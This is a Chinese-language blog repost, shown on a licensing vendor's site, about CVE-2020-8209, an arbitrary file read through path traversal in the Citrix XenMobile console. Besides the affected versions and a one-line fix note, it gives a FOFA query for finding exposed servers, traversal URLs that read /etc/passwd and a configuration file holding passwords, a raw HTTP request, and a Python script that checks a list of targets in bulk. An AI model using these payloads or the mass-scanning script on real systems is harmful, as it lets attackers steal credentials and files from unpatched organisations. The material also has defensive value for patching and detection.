许可优化
许可优化
产品
产品
解决方案
解决方案
服务支持
服务支持
关于
关于
软件库
当前位置:服务支持 >  软件文章 >  CVE-2020-8209 Citrix Endpoint Management (XenMobile)控制台任意文件读取漏洞

CVE-2020-8209 Citrix Endpoint Management (XenMobile)控制台任意文件读取漏洞

阅读数 37
点赞 0
article_banner

0x00 前言

XenMobile是Citrix开发的企业移动性管理软件,该产品允许企业管理员工的移动设备和移动应用程序,该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的 配置文件  。(该软件国外居多,国内基本很少)

RP2之前的Citrix XenMobile Server 10.12,RP4之前的Citrix XenMobile Server 10.11,RP6之前的Citrix XenMobile Server 10.10和Citrix XenMobile Server 10.9 RP5之前的访问控制不当,从而导致能够读取任意文件。

0x01 影响版本

  • RP2之前的XenMobile服务器10.12
  • RP4之前的XenMobile服务器10.11
  • RP6之前的XenMobile服务器10.10
  • 10.9 RP5之前的XenMobile服务器

0x02 FOFA语法

app="XenMobile-控制台"

0x03 漏洞复现

POC:

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd​/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties

数据包POC:

GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1Host: xxx.xxx.xxx.xxxConnection: closeUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Referer: https://fofa.so/result?qbase64=YXBwPSJYZW5Nb2JpbGUt5o6n5Yi25Y%2BwIiAmJiBjb3VudHJ5PSJERSI%3DAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9

0x04 批量脚本

#!/usr/bin/env python# coding:utf-8 import requests,sys,coloramafrom colorama import *init(autoreset=True) def XenMobile():	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}	payload= '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'	poc=urls+payload	try:		requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告		response=requests.get(poc,headers=headers,timeout=10,verify=False)		if response.status_code==200 and "root" in response.content:			print(u'\033[1;31;40m[+]{} 存在Citrix XenMobile 目录遍历漏洞'.format(urls))		else:			print('[-]{} None'.format(urls))	except:		print(u'{} 请求超时'.format(urls))  if __name__ == '__main__':	print (banner)	if len(sys.argv)!=2:		print('Example:python CVE-2020-8209-Multiple.py url.txt')	else:		file = open(sys.argv[1])		for url in file.readlines():			urls=url.strip()			XenMobile()		print ('Check Over')

0x05 修复建议

官方补丁删除了/opt/sas/ sw /tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp

转载请注明:Adminxe's Blog » CVE-2020-8209(Citrix Endpoint Management )XenMobile-控制台存在任意文件读取漏洞
免责声明:本文系网络转载或改编,未找到原创作者,版权归原作者所有。如涉及版权,请联系删


相关文章
技术文档
QR Code
微信扫一扫,欢迎咨询~
customer

online

联系我们
武汉格发信息技术有限公司
湖北省武汉市经开区科技园西路6号103孵化器
电话:155-2731-8020 座机:027-59821821
邮件:tanzw@gofarlic.com
Copyright © 2023 Gofarsoft Co.,Ltd. 保留所有权利
遇到许可问题?该如何解决!?
评估许可证实际采购量? 
不清楚软件许可证使用数据? 
收到软件厂商律师函!?  
想要少购买点许可证,节省费用? 
收到软件厂商侵权通告!?  
有正版license,但许可证不够用,需要新购? 
联系方式 board-phone 155-2731-8020
close1
预留信息,一起解决您的问题
* 姓名:
* 手机:

* 公司名称:

姓名不为空

姓名不为空

姓名不为空
手机不正确

手机不正确

手机不正确
公司不为空

公司不为空

公司不为空